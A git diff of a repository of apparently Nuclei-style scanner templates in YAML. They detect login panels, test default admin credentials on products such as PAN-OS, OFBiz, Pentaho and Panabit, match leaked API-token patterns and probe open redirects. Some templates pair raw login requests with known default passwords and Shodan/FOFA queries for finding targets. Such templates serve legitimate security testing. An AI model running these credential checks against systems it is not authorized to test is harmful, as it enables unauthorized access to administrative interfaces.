2022/07/15 diff --git a/poc/auth/ofbiz-default-credentials.yaml b/poc/auth/ofbiz-default-credentials.yaml index 449c67c5b2..9c83c79a9d 100644 --- a/poc/auth/ofbiz-default-credentials.yaml +++ b/poc/auth/ofbiz-default-credentials.yaml @@ -1,11 +1,9 @@ id: ofbiz-default-credentials - info: name: Apache OfBiz Default Credentials author: pdteam severity: medium tags: ofbiz,default-login - requests: - method: POST path: @@ -18,4 +16,4 @@ requests: words: - "ofbiz-pagination-template" - "Powered by OFBiz" - condition: and \ No newline at end of file + condition: and diff --git a/poc/auth/ofbiz-default-login-9210.yaml b/poc/auth/ofbiz-default-login-9210.yaml deleted file mode 100644 index 3c272f1007..0000000000 --- a/poc/auth/ofbiz-default-login-9210.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ofbiz-default-login - -info: - name: Apache OfBiz Default Login - author: pdteam - severity: high - description: Apache OfBiz default admin credentials were discovered. - reference: - - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: ofbiz,default-login,apache - -http: - - raw: - - | - POST /control/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y - - payloads: - username: - - admin - password: - - ofbiz - attack: pitchfork - matchers: - - type: word - words: - - "ofbiz-pagination-template" - - "Powered by OFBiz" - condition: and - -# digest: 4b0a00483046022100b51f0ae7f8930dee1c2e79a346c9747aedb0bbc606672d874692268ff0c204d7022100f433a7bb473f26f5366a2cf0cfff5749d6547992d9b06dd9e0099ac817613739:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ofbiz-default-login-9211.yaml b/poc/auth/ofbiz-default-login-9211.yaml index a7ee2e5601..ce10e4ca8d 100644 --- a/poc/auth/ofbiz-default-login-9211.yaml +++ b/poc/auth/ofbiz-default-login-9211.yaml @@ -3,6 +3,13 @@ info: name: Apache OfBiz Default Login author: pdteam severity: medium + description: Apache OfBiz default admin credentials were discovered. + reference: + - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ofbiz,default-login,apache requests: - raw: @@ -24,3 +31,5 @@ requests: - "ofbiz-pagination-template" - "Powered by OFBiz" condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/open-stack-dashboard-login-9321.yaml b/poc/auth/open-stack-dashboard-login-9321.yaml new file mode 100644 index 0000000000..9c17c71f30 --- /dev/null +++ b/poc/auth/open-stack-dashboard-login-9321.yaml @@ -0,0 +1,21 @@ +id: open-stack-dashboard-login +info: + name: OpenStack Dashboard + author: dhiyaneshDK,hackergautam + severity: info + reference: https://www.exploit-db.com/ghdb/6464 + tags: panel,openstack +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/auth/login/' + - '{{BaseURL}}/horizon/auth/login/?next=/horizon/' + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "Login - OpenStack Dashboard" + - type: status + status: + - 200 diff --git a/poc/auth/open-stack-dashboard-login-9322.yaml b/poc/auth/open-stack-dashboard-login-9322.yaml deleted file mode 100644 index 299fe028d4..0000000000 --- a/poc/auth/open-stack-dashboard-login-9322.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: open-stack-dashboard-login -info: - name: OpenStack Dashboard - author: dhiyaneshDK,hackergautam - severity: info - reference: - - https://www.exploit-db.com/ghdb/6464 - tags: panel,openstack -requests: - - method: GET - path: - - '{{BaseURL}}/dashboard/auth/login/' - - '{{BaseURL}}/horizon/auth/login/?next=/horizon/' - redirects: true - matchers-condition: and - matchers: - - type: word - words: - - "Login - OpenStack Dashboard" - - type: status - status: - - 200 diff --git a/poc/auth/open-stack-dashboard-login-9323.yaml b/poc/auth/open-stack-dashboard-login-9323.yaml index 9c17c71f30..a7a17f56ba 100644 --- a/poc/auth/open-stack-dashboard-login-9323.yaml +++ b/poc/auth/open-stack-dashboard-login-9323.yaml @@ -1,7 +1,7 @@ id: open-stack-dashboard-login info: name: OpenStack Dashboard - author: dhiyaneshDK,hackergautam + author: dhiyaneshDK & hackergautam severity: info reference: https://www.exploit-db.com/ghdb/6464 tags: panel,openstack diff --git a/poc/auth/openemr-default-login-9270.yaml b/poc/auth/openemr-default-login-9270.yaml index 56d37ca0d7..0d2f25a536 100644 --- a/poc/auth/openemr-default-login-9270.yaml +++ b/poc/auth/openemr-default-login-9270.yaml @@ -1,8 +1,8 @@ id: openemr-default-login info: - name: OpenEMR Default Login + name: OpenEMR - Default Admin Discovery author: Geekby - description: OpenEMR default login was discovered. + description: OpenEMR default admin credentials were discovered. severity: high reference: - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image @@ -39,3 +39,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/openemr-default-login.yaml b/poc/auth/openemr-default-login.yaml deleted file mode 100644 index 0d2f25a536..0000000000 --- a/poc/auth/openemr-default-login.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: openemr-default-login -info: - name: OpenEMR - Default Admin Discovery - author: Geekby - description: OpenEMR default admin credentials were discovered. - severity: high - reference: - - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - fofa-query: app="OpenEMR" - shodan-query: http.html:"OpenEMR" - tags: openemr,default-login -requests: - - raw: - - | - POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 - attack: pitchfork - payloads: - user: - - admin - pass: - - pass - matchers-condition: and - matchers: - - type: word - part: header - words: - - "main.php?token_main=" - - "OpenEMR" - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/openwrt-default-login.yaml b/poc/auth/openwrt-default-login.yaml index 50dd0fa3e5..5bbbca6acc 100644 --- a/poc/auth/openwrt-default-login.yaml +++ b/poc/auth/openwrt-default-login.yaml @@ -1,25 +1,18 @@ id: openwrt-default-login - info: - name: Opentwrt - Admin Login Page + name: Opentwrt Default Login author: For3stCo1d severity: high - description: An Opentwrt admin login page was discovered. reference: - https://forum.archive.openwrt.org/viewtopic.php?id=16611 metadata: - max-request: 1 shodan-query: http.title:"OpenWrt - LuCI" - tags: default-login,openwrt - -http: + tags: openwrt,default-login +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/luci" - matchers: - type: word words: - 'cgi-bin/luci/admin/system/admin' - -# digest: 4b0a004830460221008f900a97a3c80d4a01927a3363847754aeb95f5804553865aad9c956a45d07f0022100bb0a345862d115387483d56dce0d1d0933bb0cb118128dd0f23336373953ce30:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/oracle-opera-login.yaml b/poc/auth/oracle-opera-login.yaml new file mode 100644 index 0000000000..25b4e8b41e --- /dev/null +++ b/poc/auth/oracle-opera-login.yaml @@ -0,0 +1,38 @@ +id: oracle-opera-login + +info: + name: Oracle Opera Login - Detect + author: DhiyaneshDK,righettod + severity: info + classification: + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" + tags: panel,opera,oracle,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/OperaLogin/Welcome.do" + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Oracle, OPERA' + - 'OPERA Login' + condition: or + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100913b287a8b0b9de193b993ae33b49bbf5a2173919ce3de7d8e329e968809d37f022014587108987bac2ebd1c1f4a72620e65660690bce165d0719efa4760525faacf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/panabit-default-login-9438.yaml b/poc/auth/panabit-default-login-9438.yaml index 06d198deff..71a02ff79b 100644 --- a/poc/auth/panabit-default-login-9438.yaml +++ b/poc/auth/panabit-default-login-9438.yaml @@ -3,8 +3,16 @@ info: name: Panabit Gateway Default Login author: pikpikcu severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. tags: panabit,default-login + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -42,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/panabit-default-login-9440.yaml b/poc/auth/panabit-default-login-9440.yaml index 71a02ff79b..720a8ce721 100644 --- a/poc/auth/panabit-default-login-9440.yaml +++ b/poc/auth/panabit-default-login-9440.yaml @@ -1,18 +1,20 @@ id: panabit-default-login info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high description: Panabit Gateway default credentials were discovered. - tags: panabit,default-login reference: - https://max.book118.com/html/2017/0623/117514590.shtm - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" + tags: panabit,default-login requests: - raw: - | @@ -25,28 +27,32 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork matchers-condition: and matchers: - type: word + part: body words: - '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + - type: word + part: header + words: + - "paonline_admin" - type: status status: - 200 diff --git a/poc/auth/panabit-ixcache-default-login-9443.yaml b/poc/auth/panabit-ixcache-default-login-9443.yaml index b1e035f966..6ca7af1572 100644 --- a/poc/auth/panabit-ixcache-default-login-9443.yaml +++ b/poc/auth/panabit-ixcache-default-login-9443.yaml @@ -1,17 +1,14 @@ id: panabit-ixcache-default-login info: - name: Panabit iXCache - Default Admin Login + name: Panabit iXCache Default Login author: ritikchaddha severity: high - description: Panabit iXCache default admin login credentials were successful. reference: - http://forum.panabit.com/thread-10830-1-1.html - metadata: - max-request: 1 - tags: default-login,ixcache,panabit + tags: ixcache,default-login,panabit -http: +requests: - raw: - | POST /login/userverify.cgi HTTP/1.1 @@ -19,15 +16,16 @@ http: username={{username}}&password={{password}} - attack: pitchfork payloads: username: - admin password: - ixcache + attack: pitchfork matchers-condition: and matchers: + - type: word part: body words: @@ -36,5 +34,3 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c220cc1239979a33a9fa0ff94786fb09f6d2899e97a21be24d458ee690bf2272022100f2539225eb3aaab67a45563f00a03398885b57ed3c0dac3d2b0f6f99e3c0395d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/panabit-ixcache-default-login.yaml b/poc/auth/panabit-ixcache-default-login.yaml new file mode 100644 index 0000000000..4045f6fd00 --- /dev/null +++ b/poc/auth/panabit-ixcache-default-login.yaml @@ -0,0 +1,30 @@ +id: panabit-ixcache-default-login +info: + name: Panabit iXCache Default Login + author: ritikchaddha + severity: high + reference: + - http://forum.panabit.com/thread-10830-1-1.html + tags: ixcache,default-login,panabit +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password={{password}} + payloads: + username: + - admin + password: + - ixcache + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - "URL=/cgi-bin/monitor.cgi" + - type: status + status: + - 200 diff --git a/poc/auth/panos-default-login-9454.yaml b/poc/auth/panos-default-login-9454.yaml index 4b6d36c7fa..d08faa6f8d 100644 --- a/poc/auth/panos-default-login-9454.yaml +++ b/poc/auth/panos-default-login-9454.yaml @@ -1,11 +1,19 @@ id: panos-default-login + info: name: Palo Alto Networks PAN-OS Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. - reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. tags: panos,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + requests: - raw: - | @@ -14,21 +22,27 @@ requests: Content-Type: application/x-www-form-urlencoded user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork payloads: username: - admin password: - admin + matchers-condition: and matchers: - type: word part: header words: - "Set-Cookie: PHPSESSID" + - type: word words: - "Warning: Your device is still configured with the default admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/panos-default-login-9455.yaml b/poc/auth/panos-default-login-9455.yaml new file mode 100644 index 0000000000..4b6d36c7fa --- /dev/null +++ b/poc/auth/panos-default-login-9455.yaml @@ -0,0 +1,34 @@ +id: panos-default-login +info: + name: Palo Alto Networks PAN-OS Default Login + author: Techryptic (@Tech) + severity: high + description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: panos,default-login +requests: + - raw: + - | + POST /php/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID" + - type: word + words: + - "Warning: Your device is still configured with the default admin" + - type: status + status: + - 200 diff --git a/poc/auth/panos-default-login.yaml b/poc/auth/panos-default-login.yaml new file mode 100644 index 0000000000..cf85a349e1 --- /dev/null +++ b/poc/auth/panos-default-login.yaml @@ -0,0 +1,42 @@ +id: panos-default-login +info: + name: Palo Alto Networks PAN-OS Default Login + author: Techryptic (@Tech) + severity: high + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: panos,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /php/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID" + - type: word + words: + - "Warning: Your device is still configured with the default admin" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/paypal-braintree-token(1).yaml b/poc/auth/paypal-braintree-token(1).yaml new file mode 100644 index 0000000000..59dc3e8dbd --- /dev/null +++ b/poc/auth/paypal-braintree-token(1).yaml @@ -0,0 +1,16 @@ +id: paypal-braintree-token + +info: + name: Paypal Braintree Access Token + author: gaurang + severity: high + tags: token,file,paypal + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" diff --git a/poc/auth/paypal-braintree-token-11856.yaml b/poc/auth/paypal-braintree-token-11856.yaml deleted file mode 100644 index 142d2cb23c..0000000000 --- a/poc/auth/paypal-braintree-token-11856.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: paypal-braintree-token -info: - name: Paypal Braintree Access Token - author: gaurang - severity: high - tags: token,file,paypal -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" diff --git a/poc/auth/paypal-braintree-token.yaml b/poc/auth/paypal-braintree-token.yaml index 7b6e80e01e..142d2cb23c 100644 --- a/poc/auth/paypal-braintree-token.yaml +++ b/poc/auth/paypal-braintree-token.yaml @@ -1,5 +1,4 @@ id: paypal-braintree-token - info: name: Paypal Braintree Access Token author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" - -# digest: 4b0a00483046022100914fa8c94e14b34dcee4ae0999af373e7133288cd065c68c6e7c896ea6596ba2022100b7496af30b2264d69b60d8f9d420bb7d52294ed77bb7c762497b871053466a66:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pentaho-default-login-9477.yaml b/poc/auth/pentaho-default-login-9477.yaml index 241374072a..895781a8a6 100644 --- a/poc/auth/pentaho-default-login-9477.yaml +++ b/poc/auth/pentaho-default-login-9477.yaml @@ -1,18 +1,21 @@ id: pentaho-default-login + info: name: Pentaho Default Login author: pussycat0x - severity: high description: Pentaho default admin credentials were discovered. + severity: high + metadata: + shodan-query: pentaho + tags: pentaho,default-login reference: - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: pentaho - tags: pentaho,default-login + requests: - raw: - | @@ -21,12 +24,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 j_username={{user}}&j_password={{pass}} + attack: pitchfork payloads: user: - admin pass: - password + matchers-condition: and matchers: - type: word @@ -35,6 +40,7 @@ requests: - 'pentaho/Home' - 'JSESSIONID=' condition: and + - type: status status: - 302 diff --git a/poc/auth/pentaho-default-login-9478.yaml b/poc/auth/pentaho-default-login-9478.yaml deleted file mode 100644 index 889ea3ffa3..0000000000 --- a/poc/auth/pentaho-default-login-9478.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: pentaho-default-login -info: - name: Pentaho Default Login - author: pussycat0x - severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login -requests: - - raw: - - | - POST /pentaho/j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - j_username={{user}}&j_password={{pass}} - attack: pitchfork - payloads: - user: - - admin - pass: - - password - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'pentaho/Home' - - 'JSESSIONID=' - condition: and - - type: status - status: - - 302 diff --git a/poc/auth/pentaho-default-login-9480.yaml b/poc/auth/pentaho-default-login-9480.yaml new file mode 100644 index 0000000000..241374072a --- /dev/null +++ b/poc/auth/pentaho-default-login-9480.yaml @@ -0,0 +1,42 @@ +id: pentaho-default-login +info: + name: Pentaho Default Login + author: pussycat0x + severity: high + description: Pentaho default admin credentials were discovered. + reference: + - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login +requests: + - raw: + - | + POST /pentaho/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + j_username={{user}}&j_password={{pass}} + attack: pitchfork + payloads: + user: + - admin + pass: + - password + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'pentaho/Home' + - 'JSESSIONID=' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/phabricator-login.yaml b/poc/auth/phabricator-login.yaml index fa4fcd4139..1d760838f2 100644 --- a/poc/auth/phabricator-login.yaml +++ b/poc/auth/phabricator-login.yaml @@ -1,32 +1,20 @@ id: phabricator-login - info: - name: Phabricator Login Panel - Detect + name: Phabricator Login author: dhiyaneshDK severity: info - description: Phabricator login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: html:"phabricator-standard-page" tags: panel,phabricator - -http: + metadata: + shodan-query: 'html:"phabricator-standard-page"' +requests: - method: GET path: - '{{BaseURL}}/auth/login/' - matchers-condition: and matchers: - type: word words: - 'phabricator-standard-page' - - type: status status: - 200 - -# digest: 4b0a00483046022100c0b9d8f3946c3e2dc2f6cddccc3e0261bc9203d244d5c7f1e673a55b7c15e20b022100b956e70cef96322194942a7d3c17b1365f2e379622e85481b39329c5d25d969a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pictatic-api-key-9576.yaml b/poc/auth/pictatic-api-key-9576.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/auth/pictatic-api-key-9576.yaml +++ b/poc/auth/pictatic-api-key-9576.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/auth/pictatic-api-key.yaml b/poc/auth/pictatic-api-key.yaml index 41ea01a136..946aed1ebf 100644 --- a/poc/auth/pictatic-api-key.yaml +++ b/poc/auth/pictatic-api-key.yaml @@ -1,5 +1,4 @@ id: pictatic-api-key - info: name: Pictatic API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "sk_live_[0-9a-z]{32}" - -# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pieregister-open-redirect-9577.yaml b/poc/auth/pieregister-open-redirect-9577.yaml index 294b47b3a1..9c51ff20f2 100644 --- a/poc/auth/pieregister-open-redirect-9577.yaml +++ b/poc/auth/pieregister-open-redirect-9577.yaml @@ -1,23 +1,22 @@ id: pieregister-open-redirect + info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister + requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/auth/pieregister-open-redirect-9579.yaml b/poc/auth/pieregister-open-redirect-9579.yaml index 7a8e6baf77..294b47b3a1 100644 --- a/poc/auth/pieregister-open-redirect-9579.yaml +++ b/poc/auth/pieregister-open-redirect-9579.yaml @@ -13,11 +13,11 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' # Enhanced by mp on 2022/04/13 diff --git a/poc/auth/pieregister-plugin-open-redirect.yaml b/poc/auth/pieregister-plugin-open-redirect.yaml index c62c96f14f..e26d6d42a2 100644 --- a/poc/auth/pieregister-plugin-open-redirect.yaml +++ b/poc/auth/pieregister-plugin-open-redirect.yaml @@ -1,16 +1,16 @@ id: wptouch-plugin-open-redirect info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: Pie Register < 3.7.2.4 - Open Redirect author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030114 - severity: medium - tags: wp,redirect,wordpress + reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + severity: low + tags: wp,redirect,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" matchers: - type: regex diff --git a/poc/auth/pinpoint-unauth-9588.yaml b/poc/auth/pinpoint-unauth-9588.yaml index 067200feee..a36b59fbc2 100644 --- a/poc/auth/pinpoint-unauth-9588.yaml +++ b/poc/auth/pinpoint-unauth-9588.yaml @@ -1,20 +1,15 @@ id: pinpoint-unauth - info: name: PinPoint Unauth author: dhiyaneshDk severity: high reference: - https://github.com/pinpoint-apm/pinpoint - metadata: - max-request: 1 - tags: pippoint,unauth,misconfig - -http: + tags: pippoint,unauth +requests: - method: GET path: - '{{BaseURL}}/applications.pinpoint' - matchers-condition: and matchers: - type: word @@ -23,14 +18,10 @@ http: - "serviceType" condition: and part: body - - type: word words: - "application/json" part: header - - type: status status: - 200 - -# digest: 4a0a004730450220720fec38cacd36fac5790e2ae1d018a85439dd251463f8bb4424280af848f289022100e4ae98631a71d2271022a079a35d2a34af8d16c9df88e65930566ef5ff757e0b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pinpoint-unauth-9590.yaml b/poc/auth/pinpoint-unauth-9590.yaml deleted file mode 100644 index a36b59fbc2..0000000000 --- a/poc/auth/pinpoint-unauth-9590.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: pinpoint-unauth -info: - name: PinPoint Unauth - author: dhiyaneshDk - severity: high - reference: - - https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth -requests: - - method: GET - path: - - '{{BaseURL}}/applications.pinpoint' - matchers-condition: and - matchers: - - type: word - words: - - "applicationName" - - "serviceType" - condition: and - part: body - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/poc/auth/plastic-scm-login.yaml b/poc/auth/plastic-scm-login.yaml index 8584a79771..526875d044 100644 --- a/poc/auth/plastic-scm-login.yaml +++ b/poc/auth/plastic-scm-login.yaml @@ -1,32 +1,19 @@ id: plastic-scm-login - info: - name: Unity Plastic SCM Login Panel - Detect + name: Plastic SCM Login author: dhiyaneshDK severity: info - description: Unity Plastic SCM login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Plastic SCM" + reference: https://www.shodan.io/search?query=http.title%3A%22Log+in+-+Plastic+SCM%22 tags: panel,plastic - -http: +requests: - method: GET path: - '{{BaseURL}}/account' - matchers-condition: and matchers: - type: word words: - '<title>Log in - Plastic SCM' - - type: status status: - 200 - -# digest: 4a0a0047304502210080022742b1dcf9221e651e2f076660f08d527dbd31841bba478c458a05d3067a02204afd368d82436692176af630dec0a5264cb3e65cef6dc633626d24edf682bc9b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/polycom-login-9625.yaml b/poc/auth/polycom-login-9625.yaml deleted file mode 100644 index 29489ef1a1..0000000000 --- a/poc/auth/polycom-login-9625.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: polycom-login -info: - name: Polycom Login - author: DhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6863 - tags: panel -requests: - - method: GET - path: - - "{{BaseURL}}/login.html" - matchers-condition: and - matchers: - - type: word - words: - - "Polycom Login" - part: body - - type: status - status: - - 200 diff --git a/poc/auth/polycom-login-9627.yaml b/poc/auth/polycom-login-9627.yaml new file mode 100644 index 0000000000..ec8f498c53 --- 